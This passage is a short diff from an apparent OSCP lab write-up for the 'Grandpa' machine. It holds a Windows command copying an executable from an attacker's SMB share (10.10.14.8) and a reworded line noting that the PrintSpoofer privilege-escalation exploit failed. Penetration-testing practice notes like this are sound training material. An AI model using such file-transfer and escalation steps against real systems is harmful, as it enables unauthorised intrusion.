randalltr/oscp-pg-practice-writeups/grandpa/grandpa.md

 copy \\10.10.14.8\sharename\file.exe
 ```

-Unfortunately, PrintSpoofer, an exploit typically successful in **SeImpersonatePrivilege** vulnerabilities did not work on this machine.
+PrintSpoofer, an exploit typically successful in **SeImpersonatePrivilege** vulnerabilities, did not work on this machine.

 ---